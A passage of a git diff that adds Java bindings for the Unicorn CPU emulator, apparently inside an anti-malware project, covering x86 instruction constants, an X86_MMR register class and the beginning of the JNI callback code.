UC_X86_INS_VFNMSUB132SD = 870; + public static final int UC_X86_INS_VFNMSUB231SD = 871; + public static final int UC_X86_INS_VFNMSUBSS = 872; + public static final int UC_X86_INS_VFNMSUB213SS = 873; + public static final int UC_X86_INS_VFNMSUB132SS = 874; + public static final int UC_X86_INS_VFNMSUB231SS = 875; + public static final int UC_X86_INS_VFRCZPD = 876; + public static final int UC_X86_INS_VFRCZPS = 877; + public static final int UC_X86_INS_VFRCZSD = 878; + public static final int UC_X86_INS_VFRCZSS = 879; + public static final int UC_X86_INS_VORPD = 880; + public static final int UC_X86_INS_VORPS = 881; + public static final int UC_X86_INS_VXORPD = 882; + public static final int UC_X86_INS_VXORPS = 883; + public static final int UC_X86_INS_VGATHERDPD = 884; + public static final int UC_X86_INS_VGATHERDPS = 885; + public static final int UC_X86_INS_VGATHERPF0DPD = 886; + public static final int UC_X86_INS_VGATHERPF0DPS = 887; + public static final int UC_X86_INS_VGATHERPF0QPD = 888; + public static final int UC_X86_INS_VGATHERPF0QPS = 889; + public static final int UC_X86_INS_VGATHERPF1DPD = 890; + public static final int UC_X86_INS_VGATHERPF1DPS = 891; + public static final int UC_X86_INS_VGATHERPF1QPD = 892; + public static final int UC_X86_INS_VGATHERPF1QPS = 893; + public static final int UC_X86_INS_VGATHERQPD = 894; + public static final int UC_X86_INS_VGATHERQPS = 895; + public static final int UC_X86_INS_VHADDPD = 896; + public static final int UC_X86_INS_VHADDPS = 897; + public static final int UC_X86_INS_VHSUBPD = 898; + public static final int UC_X86_INS_VHSUBPS = 899; + public static final int UC_X86_INS_VINSERTF128 = 900; + public static final int UC_X86_INS_VINSERTF32X4 = 901; + public static final int UC_X86_INS_VINSERTF32X8 = 902; + public static final int UC_X86_INS_VINSERTF64X2 = 903; + public static final int UC_X86_INS_VINSERTF64X4 = 904; + public static final int UC_X86_INS_VINSERTI128 = 905; + public static final int UC_X86_INS_VINSERTI32X4 = 906; + public static final int UC_X86_INS_VINSERTI32X8 = 907; + public static final int UC_X86_INS_VINSERTI64X2 = 908; + public static final int UC_X86_INS_VINSERTI64X4 = 909; + public static final int UC_X86_INS_VINSERTPS = 910; + public static final int UC_X86_INS_VLDDQU = 911; + public static final int UC_X86_INS_VLDMXCSR = 912; + public static final int UC_X86_INS_VMASKMOVDQU = 913; + public static final int UC_X86_INS_VMASKMOVPD = 914; + public static final int UC_X86_INS_VMASKMOVPS = 915; + public static final int UC_X86_INS_VMAXPD = 916; + public static final int UC_X86_INS_VMAXPS = 917; + public static final int UC_X86_INS_VMAXSD = 918; + public static final int UC_X86_INS_VMAXSS = 919; + public static final int UC_X86_INS_VMCALL = 920; + public static final int UC_X86_INS_VMCLEAR = 921; + public static final int UC_X86_INS_VMFUNC = 922; + public static final int UC_X86_INS_VMINPD = 923; + public static final int UC_X86_INS_VMINPS = 924; + public static final int UC_X86_INS_VMINSD = 925; + public static final int UC_X86_INS_VMINSS = 926; + public static final int UC_X86_INS_VMLAUNCH = 927; + public static final int UC_X86_INS_VMLOAD = 928; + public static final int UC_X86_INS_VMMCALL = 929; + public static final int UC_X86_INS_VMOVQ = 930; + public static final int UC_X86_INS_VMOVDDUP = 931; + public static final int UC_X86_INS_VMOVD = 932; + public static final int UC_X86_INS_VMOVDQA32 = 933; + public static final int UC_X86_INS_VMOVDQA64 = 934; + public static final int UC_X86_INS_VMOVDQA = 935; + public static final int UC_X86_INS_VMOVDQU16 = 936; + public static final int UC_X86_INS_VMOVDQU32 = 937; + public static final int UC_X86_INS_VMOVDQU64 = 938; + public static final int UC_X86_INS_VMOVDQU8 = 939; + public static final int UC_X86_INS_VMOVDQU = 940; + public static final int UC_X86_INS_VMOVHLPS = 941; + public static final int UC_X86_INS_VMOVHPD = 942; + public static final int UC_X86_INS_VMOVHPS = 943; + public static final int UC_X86_INS_VMOVLHPS = 944; + public static final int UC_X86_INS_VMOVLPD = 945; + public static final int UC_X86_INS_VMOVLPS = 946; + public static final int UC_X86_INS_VMOVMSKPD = 947; + public static final int UC_X86_INS_VMOVMSKPS = 948; + public static final int UC_X86_INS_VMOVNTDQA = 949; + public static final int UC_X86_INS_VMOVNTDQ = 950; + public static final int UC_X86_INS_VMOVNTPD = 951; + public static final int UC_X86_INS_VMOVNTPS = 952; + public static final int UC_X86_INS_VMOVSD = 953; + public static final int UC_X86_INS_VMOVSHDUP = 954; + public static final int UC_X86_INS_VMOVSLDUP = 955; + public static final int UC_X86_INS_VMOVSS = 956; + public static final int UC_X86_INS_VMOVUPD = 957; + public static final int UC_X86_INS_VMOVUPS = 958; + public static final int UC_X86_INS_VMPSADBW = 959; + public static final int UC_X86_INS_VMPTRLD = 960; + public static final int UC_X86_INS_VMPTRST = 961; + public static final int UC_X86_INS_VMREAD = 962; + public static final int UC_X86_INS_VMRESUME = 963; + public static final int UC_X86_INS_VMRUN = 964; + public static final int UC_X86_INS_VMSAVE = 965; + public static final int UC_X86_INS_VMULPD = 966; + public static final int UC_X86_INS_VMULPS = 967; + public static final int UC_X86_INS_VMULSD = 968; + public static final int UC_X86_INS_VMULSS = 969; + public static final int UC_X86_INS_VMWRITE = 970; + public static final int UC_X86_INS_VMXOFF = 971; + public static final int UC_X86_INS_VMXON = 972; + public static final int UC_X86_INS_VPABSB = 973; + public static final int UC_X86_INS_VPABSD = 974; + public static final int UC_X86_INS_VPABSQ = 975; + public static final int UC_X86_INS_VPABSW = 976; + public static final int UC_X86_INS_VPACKSSDW = 977; + public static final int UC_X86_INS_VPACKSSWB = 978; + public static final int UC_X86_INS_VPACKUSDW = 979; + public static final int UC_X86_INS_VPACKUSWB = 980; + public static final int UC_X86_INS_VPADDB = 981; + public static final int UC_X86_INS_VPADDD = 982; + public static final int UC_X86_INS_VPADDQ = 983; + public static final int UC_X86_INS_VPADDSB = 984; + public static final int UC_X86_INS_VPADDSW = 985; + public static final int UC_X86_INS_VPADDUSB = 986; + public static final int UC_X86_INS_VPADDUSW = 987; + public static final int UC_X86_INS_VPADDW = 988; + public static final int UC_X86_INS_VPALIGNR = 989; + public static final int UC_X86_INS_VPANDD = 990; + public static final int UC_X86_INS_VPANDND = 991; + public static final int UC_X86_INS_VPANDNQ = 992; + public static final int UC_X86_INS_VPANDN = 993; + public static final int UC_X86_INS_VPANDQ = 994; + public static final int UC_X86_INS_VPAND = 995; + public static final int UC_X86_INS_VPAVGB = 996; + public static final int UC_X86_INS_VPAVGW = 997; + public static final int UC_X86_INS_VPBLENDD = 998; + public static final int UC_X86_INS_VPBLENDMB = 999; + public static final int UC_X86_INS_VPBLENDMD = 1000; + public static final int UC_X86_INS_VPBLENDMQ = 1001; + public static final int UC_X86_INS_VPBLENDMW = 1002; + public static final int UC_X86_INS_VPBLENDVB = 1003; + public static final int UC_X86_INS_VPBLENDW = 1004; + public static final int UC_X86_INS_VPBROADCASTB = 1005; + public static final int UC_X86_INS_VPBROADCASTD = 1006; + public static final int UC_X86_INS_VPBROADCASTMB2Q = 1007; + public static final int UC_X86_INS_VPBROADCASTMW2D = 1008; + public static final int UC_X86_INS_VPBROADCASTQ = 1009; + public static final int UC_X86_INS_VPBROADCASTW = 1010; + public static final int UC_X86_INS_VPCLMULQDQ = 1011; + public static final int UC_X86_INS_VPCMOV = 1012; + public static final int UC_X86_INS_VPCMPB = 1013; + public static final int UC_X86_INS_VPCMPD = 1014; + public static final int UC_X86_INS_VPCMPEQB = 1015; + public static final int UC_X86_INS_VPCMPEQD = 1016; + public static final int UC_X86_INS_VPCMPEQQ = 1017; + public static final int UC_X86_INS_VPCMPEQW = 1018; + public static final int UC_X86_INS_VPCMPESTRI = 1019; + public static final int UC_X86_INS_VPCMPESTRM = 1020; + public static final int UC_X86_INS_VPCMPGTB = 1021; + public static final int UC_X86_INS_VPCMPGTD = 1022; + public static final int UC_X86_INS_VPCMPGTQ = 1023; + public static final int UC_X86_INS_VPCMPGTW = 1024; + public static final int UC_X86_INS_VPCMPISTRI = 1025; + public static final int UC_X86_INS_VPCMPISTRM = 1026; + public static final int UC_X86_INS_VPCMPQ = 1027; + public static final int UC_X86_INS_VPCMPUB = 1028; + public static final int UC_X86_INS_VPCMPUD = 1029; + public static final int UC_X86_INS_VPCMPUQ = 1030; + public static final int UC_X86_INS_VPCMPUW = 1031; + public static final int UC_X86_INS_VPCMPW = 1032; + public static final int UC_X86_INS_VPCOMB = 1033; + public static final int UC_X86_INS_VPCOMD = 1034; + public static final int UC_X86_INS_VPCOMPRESSD = 1035; + public static final int UC_X86_INS_VPCOMPRESSQ = 1036; + public static final int UC_X86_INS_VPCOMQ = 1037; + public static final int UC_X86_INS_VPCOMUB = 1038; + public static final int UC_X86_INS_VPCOMUD = 1039; + public static final int UC_X86_INS_VPCOMUQ = 1040; + public static final int UC_X86_INS_VPCOMUW = 1041; + public static final int UC_X86_INS_VPCOMW = 1042; + public static final int UC_X86_INS_VPCONFLICTD = 1043; + public static final int UC_X86_INS_VPCONFLICTQ = 1044; + public static final int UC_X86_INS_VPERM2F128 = 1045; + public static final int UC_X86_INS_VPERM2I128 = 1046; + public static final int UC_X86_INS_VPERMD = 1047; + public static final int UC_X86_INS_VPERMI2D = 1048; + public static final int UC_X86_INS_VPERMI2PD = 1049; + public static final int UC_X86_INS_VPERMI2PS = 1050; + public static final int UC_X86_INS_VPERMI2Q = 1051; + public static final int UC_X86_INS_VPERMIL2PD = 1052; + public static final int UC_X86_INS_VPERMIL2PS = 1053; + public static final int UC_X86_INS_VPERMILPD = 1054; + public static final int UC_X86_INS_VPERMILPS = 1055; + public static final int UC_X86_INS_VPERMPD = 1056; + public static final int UC_X86_INS_VPERMPS = 1057; + public static final int UC_X86_INS_VPERMQ = 1058; + public static final int UC_X86_INS_VPERMT2D = 1059; + public static final int UC_X86_INS_VPERMT2PD = 1060; + public static final int UC_X86_INS_VPERMT2PS = 1061; + public static final int UC_X86_INS_VPERMT2Q = 1062; + public static final int UC_X86_INS_VPEXPANDD = 1063; + public static final int UC_X86_INS_VPEXPANDQ = 1064; + public static final int UC_X86_INS_VPEXTRB = 1065; + public static final int UC_X86_INS_VPEXTRD = 1066; + public static final int UC_X86_INS_VPEXTRQ = 1067; + public static final int UC_X86_INS_VPEXTRW = 1068; + public static final int UC_X86_INS_VPGATHERDD = 1069; + public static final int UC_X86_INS_VPGATHERDQ = 1070; + public static final int UC_X86_INS_VPGATHERQD = 1071; + public static final int UC_X86_INS_VPGATHERQQ = 1072; + public static final int UC_X86_INS_VPHADDBD = 1073; + public static final int UC_X86_INS_VPHADDBQ = 1074; + public static final int UC_X86_INS_VPHADDBW = 1075; + public static final int UC_X86_INS_VPHADDDQ = 1076; + public static final int UC_X86_INS_VPHADDD = 1077; + public static final int UC_X86_INS_VPHADDSW = 1078; + public static final int UC_X86_INS_VPHADDUBD = 1079; + public static final int UC_X86_INS_VPHADDUBQ = 1080; + public static final int UC_X86_INS_VPHADDUBW = 1081; + public static final int UC_X86_INS_VPHADDUDQ = 1082; + public static final int UC_X86_INS_VPHADDUWD = 1083; + public static final int UC_X86_INS_VPHADDUWQ = 1084; + public static final int UC_X86_INS_VPHADDWD = 1085; + public static final int UC_X86_INS_VPHADDWQ = 1086; + public static final int UC_X86_INS_VPHADDW = 1087; + public static final int UC_X86_INS_VPHMINPOSUW = 1088; + public static final int UC_X86_INS_VPHSUBBW = 1089; + public static final int UC_X86_INS_VPHSUBDQ = 1090; + public static final int UC_X86_INS_VPHSUBD = 1091; + public static final int UC_X86_INS_VPHSUBSW = 1092; + public static final int UC_X86_INS_VPHSUBWD = 1093; + public static final int UC_X86_INS_VPHSUBW = 1094; + public static final int UC_X86_INS_VPINSRB = 1095; + public static final int UC_X86_INS_VPINSRD = 1096; + public static final int UC_X86_INS_VPINSRQ = 1097; + public static final int UC_X86_INS_VPINSRW = 1098; + public static final int UC_X86_INS_VPLZCNTD = 1099; + public static final int UC_X86_INS_VPLZCNTQ = 1100; + public static final int UC_X86_INS_VPMACSDD = 1101; + public static final int UC_X86_INS_VPMACSDQH = 1102; + public static final int UC_X86_INS_VPMACSDQL = 1103; + public static final int UC_X86_INS_VPMACSSDD = 1104; + public static final int UC_X86_INS_VPMACSSDQH = 1105; + public static final int UC_X86_INS_VPMACSSDQL = 1106; + public static final int UC_X86_INS_VPMACSSWD = 1107; + public static final int UC_X86_INS_VPMACSSWW = 1108; + public static final int UC_X86_INS_VPMACSWD = 1109; + public static final int UC_X86_INS_VPMACSWW = 1110; + public static final int UC_X86_INS_VPMADCSSWD = 1111; + public static final int UC_X86_INS_VPMADCSWD = 1112; + public static final int UC_X86_INS_VPMADDUBSW = 1113; + public static final int UC_X86_INS_VPMADDWD = 1114; + public static final int UC_X86_INS_VPMASKMOVD = 1115; + public static final int UC_X86_INS_VPMASKMOVQ = 1116; + public static final int UC_X86_INS_VPMAXSB = 1117; + public static final int UC_X86_INS_VPMAXSD = 1118; + public static final int UC_X86_INS_VPMAXSQ = 1119; + public static final int UC_X86_INS_VPMAXSW = 1120; + public static final int UC_X86_INS_VPMAXUB = 1121; + public static final int UC_X86_INS_VPMAXUD = 1122; + public static final int UC_X86_INS_VPMAXUQ = 1123; + public static final int UC_X86_INS_VPMAXUW = 1124; + public static final int UC_X86_INS_VPMINSB = 1125; + public static final int UC_X86_INS_VPMINSD = 1126; + public static final int UC_X86_INS_VPMINSQ = 1127; + public static final int UC_X86_INS_VPMINSW = 1128; + public static final int UC_X86_INS_VPMINUB = 1129; + public static final int UC_X86_INS_VPMINUD = 1130; + public static final int UC_X86_INS_VPMINUQ = 1131; + public static final int UC_X86_INS_VPMINUW = 1132; + public static final int UC_X86_INS_VPMOVDB = 1133; + public static final int UC_X86_INS_VPMOVDW = 1134; + public static final int UC_X86_INS_VPMOVM2B = 1135; + public static final int UC_X86_INS_VPMOVM2D = 1136; + public static final int UC_X86_INS_VPMOVM2Q = 1137; + public static final int UC_X86_INS_VPMOVM2W = 1138; + public static final int UC_X86_INS_VPMOVMSKB = 1139; + public static final int UC_X86_INS_VPMOVQB = 1140; + public static final int UC_X86_INS_VPMOVQD = 1141; + public static final int UC_X86_INS_VPMOVQW = 1142; + public static final int UC_X86_INS_VPMOVSDB = 1143; + public static final int UC_X86_INS_VPMOVSDW = 1144; + public static final int UC_X86_INS_VPMOVSQB = 1145; + public static final int UC_X86_INS_VPMOVSQD = 1146; + public static final int UC_X86_INS_VPMOVSQW = 1147; + public static final int UC_X86_INS_VPMOVSXBD = 1148; + public static final int UC_X86_INS_VPMOVSXBQ = 1149; + public static final int UC_X86_INS_VPMOVSXBW = 1150; + public static final int UC_X86_INS_VPMOVSXDQ = 1151; + public static final int UC_X86_INS_VPMOVSXWD = 1152; + public static final int UC_X86_INS_VPMOVSXWQ = 1153; + public static final int UC_X86_INS_VPMOVUSDB = 1154; + public static final int UC_X86_INS_VPMOVUSDW = 1155; + public static final int UC_X86_INS_VPMOVUSQB = 1156; + public static final int UC_X86_INS_VPMOVUSQD = 1157; + public static final int UC_X86_INS_VPMOVUSQW = 1158; + public static final int UC_X86_INS_VPMOVZXBD = 1159; + public static final int UC_X86_INS_VPMOVZXBQ = 1160; + public static final int UC_X86_INS_VPMOVZXBW = 1161; + public static final int UC_X86_INS_VPMOVZXDQ = 1162; + public static final int UC_X86_INS_VPMOVZXWD = 1163; + public static final int UC_X86_INS_VPMOVZXWQ = 1164; + public static final int UC_X86_INS_VPMULDQ = 1165; + public static final int UC_X86_INS_VPMULHRSW = 1166; + public static final int UC_X86_INS_VPMULHUW = 1167; + public static final int UC_X86_INS_VPMULHW = 1168; + public static final int UC_X86_INS_VPMULLD = 1169; + public static final int UC_X86_INS_VPMULLQ = 1170; + public static final int UC_X86_INS_VPMULLW = 1171; + public static final int UC_X86_INS_VPMULUDQ = 1172; + public static final int UC_X86_INS_VPORD = 1173; + public static final int UC_X86_INS_VPORQ = 1174; + public static final int UC_X86_INS_VPOR = 1175; + public static final int UC_X86_INS_VPPERM = 1176; + public static final int UC_X86_INS_VPROTB = 1177; + public static final int UC_X86_INS_VPROTD = 1178; + public static final int UC_X86_INS_VPROTQ = 1179; + public static final int UC_X86_INS_VPROTW = 1180; + public static final int UC_X86_INS_VPSADBW = 1181; + public static final int UC_X86_INS_VPSCATTERDD = 1182; + public static final int UC_X86_INS_VPSCATTERDQ = 1183; + public static final int UC_X86_INS_VPSCATTERQD = 1184; + public static final int UC_X86_INS_VPSCATTERQQ = 1185; + public static final int UC_X86_INS_VPSHAB = 1186; + public static final int UC_X86_INS_VPSHAD = 1187; + public static final int UC_X86_INS_VPSHAQ = 1188; + public static final int UC_X86_INS_VPSHAW = 1189; + public static final int UC_X86_INS_VPSHLB = 1190; + public static final int UC_X86_INS_VPSHLD = 1191; + public static final int UC_X86_INS_VPSHLQ = 1192; + public static final int UC_X86_INS_VPSHLW = 1193; + public static final int UC_X86_INS_VPSHUFB = 1194; + public static final int UC_X86_INS_VPSHUFD = 1195; + public static final int UC_X86_INS_VPSHUFHW = 1196; + public static final int UC_X86_INS_VPSHUFLW = 1197; + public static final int UC_X86_INS_VPSIGNB = 1198; + public static final int UC_X86_INS_VPSIGND = 1199; + public static final int UC_X86_INS_VPSIGNW = 1200; + public static final int UC_X86_INS_VPSLLDQ = 1201; + public static final int UC_X86_INS_VPSLLD = 1202; + public static final int UC_X86_INS_VPSLLQ = 1203; + public static final int UC_X86_INS_VPSLLVD = 1204; + public static final int UC_X86_INS_VPSLLVQ = 1205; + public static final int UC_X86_INS_VPSLLW = 1206; + public static final int UC_X86_INS_VPSRAD = 1207; + public static final int UC_X86_INS_VPSRAQ = 1208; + public static final int UC_X86_INS_VPSRAVD = 1209; + public static final int UC_X86_INS_VPSRAVQ = 1210; + public static final int UC_X86_INS_VPSRAW = 1211; + public static final int UC_X86_INS_VPSRLDQ = 1212; + public static final int UC_X86_INS_VPSRLD = 1213; + public static final int UC_X86_INS_VPSRLQ = 1214; + public static final int UC_X86_INS_VPSRLVD = 1215; + public static final int UC_X86_INS_VPSRLVQ = 1216; + public static final int UC_X86_INS_VPSRLW = 1217; + public static final int UC_X86_INS_VPSUBB = 1218; + public static final int UC_X86_INS_VPSUBD = 1219; + public static final int UC_X86_INS_VPSUBQ = 1220; + public static final int UC_X86_INS_VPSUBSB = 1221; + public static final int UC_X86_INS_VPSUBSW = 1222; + public static final int UC_X86_INS_VPSUBUSB = 1223; + public static final int UC_X86_INS_VPSUBUSW = 1224; + public static final int UC_X86_INS_VPSUBW = 1225; + public static final int UC_X86_INS_VPTESTMD = 1226; + public static final int UC_X86_INS_VPTESTMQ = 1227; + public static final int UC_X86_INS_VPTESTNMD = 1228; + public static final int UC_X86_INS_VPTESTNMQ = 1229; + public static final int UC_X86_INS_VPTEST = 1230; + public static final int UC_X86_INS_VPUNPCKHBW = 1231; + public static final int UC_X86_INS_VPUNPCKHDQ = 1232; + public static final int UC_X86_INS_VPUNPCKHQDQ = 1233; + public static final int UC_X86_INS_VPUNPCKHWD = 1234; + public static final int UC_X86_INS_VPUNPCKLBW = 1235; + public static final int UC_X86_INS_VPUNPCKLDQ = 1236; + public static final int UC_X86_INS_VPUNPCKLQDQ = 1237; + public static final int UC_X86_INS_VPUNPCKLWD = 1238; + public static final int UC_X86_INS_VPXORD = 1239; + public static final int UC_X86_INS_VPXORQ = 1240; + public static final int UC_X86_INS_VPXOR = 1241; + public static final int UC_X86_INS_VRCP14PD = 1242; + public static final int UC_X86_INS_VRCP14PS = 1243; + public static final int UC_X86_INS_VRCP14SD = 1244; + public static final int UC_X86_INS_VRCP14SS = 1245; + public static final int UC_X86_INS_VRCP28PD = 1246; + public static final int UC_X86_INS_VRCP28PS = 1247; + public static final int UC_X86_INS_VRCP28SD = 1248; + public static final int UC_X86_INS_VRCP28SS = 1249; + public static final int UC_X86_INS_VRCPPS = 1250; + public static final int UC_X86_INS_VRCPSS = 1251; + public static final int UC_X86_INS_VRNDSCALEPD = 1252; + public static final int UC_X86_INS_VRNDSCALEPS = 1253; + public static final int UC_X86_INS_VRNDSCALESD = 1254; + public static final int UC_X86_INS_VRNDSCALESS = 1255; + public static final int UC_X86_INS_VROUNDPD = 1256; + public static final int UC_X86_INS_VROUNDPS = 1257; + public static final int UC_X86_INS_VROUNDSD = 1258; + public static final int UC_X86_INS_VROUNDSS = 1259; + public static final int UC_X86_INS_VRSQRT14PD = 1260; + public static final int UC_X86_INS_VRSQRT14PS = 1261; + public static final int UC_X86_INS_VRSQRT14SD = 1262; + public static final int UC_X86_INS_VRSQRT14SS = 1263; + public static final int UC_X86_INS_VRSQRT28PD = 1264; + public static final int UC_X86_INS_VRSQRT28PS = 1265; + public static final int UC_X86_INS_VRSQRT28SD = 1266; + public static final int UC_X86_INS_VRSQRT28SS = 1267; + public static final int UC_X86_INS_VRSQRTPS = 1268; + public static final int UC_X86_INS_VRSQRTSS = 1269; + public static final int UC_X86_INS_VSCATTERDPD = 1270; + public static final int UC_X86_INS_VSCATTERDPS = 1271; + public static final int UC_X86_INS_VSCATTERPF0DPD = 1272; + public static final int UC_X86_INS_VSCATTERPF0DPS = 1273; + public static final int UC_X86_INS_VSCATTERPF0QPD = 1274; + public static final int UC_X86_INS_VSCATTERPF0QPS = 1275; + public static final int UC_X86_INS_VSCATTERPF1DPD = 1276; + public static final int UC_X86_INS_VSCATTERPF1DPS = 1277; + public static final int UC_X86_INS_VSCATTERPF1QPD = 1278; + public static final int UC_X86_INS_VSCATTERPF1QPS = 1279; + public static final int UC_X86_INS_VSCATTERQPD = 1280; + public static final int UC_X86_INS_VSCATTERQPS = 1281; + public static final int UC_X86_INS_VSHUFPD = 1282; + public static final int UC_X86_INS_VSHUFPS = 1283; + public static final int UC_X86_INS_VSQRTPD = 1284; + public static final int UC_X86_INS_VSQRTPS = 1285; + public static final int UC_X86_INS_VSQRTSD = 1286; + public static final int UC_X86_INS_VSQRTSS = 1287; + public static final int UC_X86_INS_VSTMXCSR = 1288; + public static final int UC_X86_INS_VSUBPD = 1289; + public static final int UC_X86_INS_VSUBPS = 1290; + public static final int UC_X86_INS_VSUBSD = 1291; + public static final int UC_X86_INS_VSUBSS = 1292; + public static final int UC_X86_INS_VTESTPD = 1293; + public static final int UC_X86_INS_VTESTPS = 1294; + public static final int UC_X86_INS_VUNPCKHPD = 1295; + public static final int UC_X86_INS_VUNPCKHPS = 1296; + public static final int UC_X86_INS_VUNPCKLPD = 1297; + public static final int UC_X86_INS_VUNPCKLPS = 1298; + public static final int UC_X86_INS_VZEROALL = 1299; + public static final int UC_X86_INS_VZEROUPPER = 1300; + public static final int UC_X86_INS_WAIT = 1301; + public static final int UC_X86_INS_WBINVD = 1302; + public static final int UC_X86_INS_WRFSBASE = 1303; + public static final int UC_X86_INS_WRGSBASE = 1304; + public static final int UC_X86_INS_WRMSR = 1305; + public static final int UC_X86_INS_XABORT = 1306; + public static final int UC_X86_INS_XACQUIRE = 1307; + public static final int UC_X86_INS_XBEGIN = 1308; + public static final int UC_X86_INS_XCHG = 1309; + public static final int UC_X86_INS_XCRYPTCBC = 1310; + public static final int UC_X86_INS_XCRYPTCFB = 1311; + public static final int UC_X86_INS_XCRYPTCTR = 1312; + public static final int UC_X86_INS_XCRYPTECB = 1313; + public static final int UC_X86_INS_XCRYPTOFB = 1314; + public static final int UC_X86_INS_XEND = 1315; + public static final int UC_X86_INS_XGETBV = 1316; + public static final int UC_X86_INS_XLATB = 1317; + public static final int UC_X86_INS_XRELEASE = 1318; + public static final int UC_X86_INS_XRSTOR = 1319; + public static final int UC_X86_INS_XRSTOR64 = 1320; + public static final int UC_X86_INS_XRSTORS = 1321; + public static final int UC_X86_INS_XRSTORS64 = 1322; + public static final int UC_X86_INS_XSAVE = 1323; + public static final int UC_X86_INS_XSAVE64 = 1324; + public static final int UC_X86_INS_XSAVEC = 1325; + public static final int UC_X86_INS_XSAVEC64 = 1326; + public static final int UC_X86_INS_XSAVEOPT = 1327; + public static final int UC_X86_INS_XSAVEOPT64 = 1328; + public static final int UC_X86_INS_XSAVES = 1329; + public static final int UC_X86_INS_XSAVES64 = 1330; + public static final int UC_X86_INS_XSETBV = 1331; + public static final int UC_X86_INS_XSHA1 = 1332; + public static final int UC_X86_INS_XSHA256 = 1333; + public static final int UC_X86_INS_XSTORE = 1334; + public static final int UC_X86_INS_XTEST = 1335; + public static final int UC_X86_INS_FDISI8087_NOP = 1336; + public static final int UC_X86_INS_FENI8087_NOP = 1337; + public static final int UC_X86_INS_ENDING = 1338; + +} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java new file mode 100644 index 0000000..1c3db2b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn/X86_MMR.java @@ -0,0 +1,46 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2016 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +package unicorn; + +public class X86_MMR { + + public long base; + public int limit; + public int flags; + public short selector; + + public X86_MMR(long base, int limit, int flags, short selector) { + this.base = base; + this.limit = limit; + this.flags = flags; + this.selector = selector; + } + + public X86_MMR(long base, int limit) { + this.base = base; + this.limit = limit; + selector = 0; + flags = 0; + } + +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c new file mode 100644 index 0000000..ccf335f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/java/unicorn_Unicorn.c @@ -0,0 +1,781 @@ +/* + +Java bindings for the Unicorn Emulator Engine + +Copyright(c) 2015 Chris Eagle + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +version 2 as published by the Free Software Foundation. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. + +*/ + +#include +#include "unicorn/platform.h" +#include +#include + +#include +#include +#include "unicorn_Unicorn.h" + +//cache jmethodID values as we look them up +static jmethodID invokeBlockCallbacks = 0; +static jmethodID invokeInterruptCallbacks = 0; +static jmethodID invokeCodeCallbacks = 0; + +static jmethodID invokeEventMemCallbacks = 0; +static jmethodID invokeReadCallbacks = 0; +static jmethodID invokeWriteCallbacks = 0; +static jmethodID invokeInCallbacks = 0; +static jmethodID invokeOutCallbacks = 0; +static jmethodID invokeSyscallCallbacks = 0; + +static JavaVM* cachedJVM; + +JNIEXPORT jint JNICALL JNI_OnLoad(JavaVM *jvm, void *reserved) { + cachedJVM = jvm; + return JNI_VERSION_1_6; +} + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. +static void cb_hookcode(uc_engine *eng, uint64_t address, uint32_t size, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeCodeCallbacks, (jlong)eng, (jlong)address, (int)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. +static void cb_hookblock(uc_engine *eng, uint64_t address, uint32_t size, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeBlockCallbacks, (jlong)eng, (jlong)address, (int)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing interrupts (for uc_hook_intr()) +// @intno: interrupt number +// @user_data: user data passed to tracing APIs. +static void cb_hookintr(uc_engine *eng, uint32_t intno, void *user_data) { + JNIEnv *env; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return; + } + (*env)->CallStaticVoidMethod(env, clz, invokeInterruptCallbacks, (jlong)eng, (int)intno); + (*cachedJVM)->DetachCurrentThread(cachedJVM); +} + +// Callback function for tracing IN instruction of X86 +// @port: port number +// @size: data size (1/2/4) to be read from this port +// @user_data: user data passed to tracing APIs. +static uint32_t cb_insn_in(uc_engine *eng, uint32_t port, int size, void *user_data) { + JNIEnv *env; + uint32_t res = 0; + (*cachedJVM)->AttachCurrentThread(cachedJVM, (void **)&env, NULL); + jclass clz = (*env)->FindClass(env, "unicorn/Unicorn"); + if ((*env)->ExceptionCheck(env)) { + return 0; + } + res = (uint32_t)(*env)->CallStaticIntMethod(env, clz, invokeInCallbacks, (jlong)eng, (jint)port, (jint)size); + (*cachedJVM)->DetachCurrentThread(cachedJVM); + return res; +} + +// x86's handler for OUT +// @port: port number +// @size: data size 